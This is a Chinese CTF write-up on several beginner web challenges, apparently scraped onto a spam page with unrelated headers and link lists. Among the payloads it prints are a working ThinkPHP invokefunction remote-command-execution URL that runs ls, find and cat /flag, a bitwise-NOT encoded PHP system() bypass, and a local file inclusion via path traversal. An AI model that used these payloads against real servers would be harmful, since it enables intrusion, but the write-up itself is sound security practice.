当前位置: 首页 > wzjs >正文

价格对比网站开发湛江小程序开发公司

wzjs 2025/9/22 8:09:55
价格对比网站开发,湛江小程序开发公司,关键词挖掘ppt,网站统计怎么做把攻防世界的web做了20道左右&#xff0c;挑了几道学到东西的题目记录一下 攻防世界warmup 进到环境中读取源代码发先有个提示&#xff1a;source.php&#xff0c;进去看看 <?phphighlight_file(__FILE__);class emmm{public static function checkFile(&$page){$wh…

把攻防世界的web做了20道左右,挑了几道学到东西的题目记录一下

攻防世界warmup

进到环境中读取源代码在这里插入图片描述发先有个提示:source.php,进去看看

<?phphighlight_file(__FILE__);class emmm{public static function checkFile(&$page){$whitelist = ["source"=>"source.php","hint"=>"hint.php"];if (! isset($page) || !is_string($page)) {echo "you can't see it";return false;}if (in_array($page, $whitelist)) {return true;}$_page = mb_substr($page,0,mb_strpos($page . '?', '?'));if (in_array($_page, $whitelist)) {return true;}$_page = urldecode($page);$_page = mb_substr($_page,0,mb_strpos($_page . '?', '?'));if (in_array($_page, $whitelist)) {return true;}echo "you can't see it";return false;}}if (! empty($_REQUEST['file'])&& is_string($_REQUEST['file'])&& emmm::checkFile($_REQUEST['file'])) {include $_REQUEST['file'];exit;} else {echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";}  
?>

代码审计一下,发现一个hint.php进去看看在这里插入图片描述提示了flag的位置,而且在下面发现了include函数,说明可能存在本地文件包含漏洞,而且这里知道了flag的位置,就可以尝试利用目录穿越的方法在这里插入图片描述

攻防世界ics-06

这道题感觉非常灵活,首先根据题目的提示是在云数据管理中心在这里插入图片描述看上去感觉信息很多,但是发现左边能互动的也就报表中心能点进去在这里插入图片描述点进去发现有个查询的功能,而且头上有个id=1,感觉看到这个就是SQL注入走不动道了…但是一直在尝试是什么闭合的时候发现怎么尝试都没有用,去查询的时候发现上面的id值会变化,才发现这题的思路是对id的值进行爆破在这里插入图片描述发现id=2333的时候有flag,这道题题目难度不大,关键是思路

攻防世界PHP2

在这里插入图片描述进入环境看到没有给出代码,需要自己找注入点,扫一下后台在这里插入图片描述发现了个index.php但是访问了还是跟这个界面一样,看到题目说是PHP2,就把2试到了5,还是没东西,后面区域看了wp才知道一般网页提供给用户游览的PHP文件是phps格式,用户一般不能通过web游览php文件,所以这里去访问index.phps才是正解在这里插入图片描述代码审计,需要用get请求传入一个admin,但是中间会对传入的admin进行URL解码,所以需要先对admin进行两次URL来绕过(网页会自动进行一次URL解码,所以这里存在两次URL解码)在这里插入图片描述这里还有一个坑,就是进行传参的时候要在index.php的地方传参,我的理解是index.phps文件只是读取的文件。但是能交互的还是要在php处实现在这里插入图片描述

攻防世界php_rce

这题是考察了信息收集的能力在这里插入图片描述进入环境之后发现就是这一段文字,我还在这个界面去找RCE注入的点,但是根本找不到一点,接着用御剑扫了一下,也是没有收获在这里插入图片描述
后面看了一下wp。发现这个题的thinkphp不是白给的,这是一种php框架, 这题考察的就是对这种框架的注入
这道题目的思路很明确,就是让自己去找,这里找到了大佬的博客
thinkphp漏洞复现
根据博客的思路,网上找了一堆poc去试了一下,发现这个能用

index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls

在这里插入图片描述说明该网站存在命令执行漏洞,根据这种框架的特殊性,查找所有含flag的路径

index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=find / -name “flag*

在这里插入图片描述
cat一下

index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat%20/flag

在这里插入图片描述

[SWPUCTF 2021 新生赛]hardrce

打开环境在这里插入图片描述代码审计一下,发现是无字母的RCE,观察黑名单发现没过滤~取反符号跟%,所以这题可以用取反绕过来做
构造ls

?wllm=system('ls /');
?wllm=(~%8C%86%8C%8B%9A%92)(~%93%8C%DF%D0);

在这里插入图片描述
发现了flag,接下来得到它

?wllm=system('cat /flllllaaaaaaggggggg');
?wllm=(~%8C%86%8C%8B%9A%92)(~%9C%9E%8B%DF%D0%99%93%93%93%93%93%9E%9E%9E%9E%9E%9E%98%98%98%98%98%98%98);

在这里插入图片描述
这题主要是复习了一下无字母的RCE绕过

http://www.dtcms.com/wzjs/826524.html

相关文章:

  • 东莞网站推广公司黄页网站建设叁金手指花总7
  • sem分析是什么意思seo好学吗入门怎么学
  • 重庆网站建设备案定制和订制的区别
  • 学校网站源码电子商务平台经营者名词解释
  • 达州科创网站建设公司网站手机端打不开
  • 苏州网站推广软件台州做网站需要多少钱
  • 歪咪小麻花官方网站怎么做零售网站备案许可证号查询网站
  • WordPress情侣网站济南莱芜金点子信息港
  • 营销网站 深圳飞数石家庄网站建设
  • 网站开发的相关岗位wordpress账户密码忘记
  • 网站策划图上海网络推广工资
  • 支付宝网站接口申请建筑书店
  • 上海cms建站机关单位网站建设合同
  • 写网站教程有手机版本wordpress
  • 怎么在wordpress免费注册博客网站微信公众号 手机网站
  • 郑州彩票网站开发辽宁建设工程信息网专家库官网
  • 政协网站法治建设版块老榕树网站建设
  • 网站制作公司如何运作什么网站做视频
  • 石狮网站网站建设推广平台
  • 南阳建网站wordpress hello dolly
  • 网站登录系统怎么做哈尔滨高端模板建站
  • 怎么确定电商网站建设的目标wordpress 导入用户
  • 大连平台网站建设展厅设计ppt汇报
  • 国外哪个网站做c 挣钱网站公司怎么做的好
  • 天目西路网站建设茶网站建设
  • 演出票务网站建设英大保险公司官网
  • 深圳宝安区天气李勇seo的博客
  • 网站为什么需要备案艺术设计专业学什么
  • 外贸网站建站平台宝塔wordpress ssl证书
  • 江津网站建设口碑医院网站建设熊掌号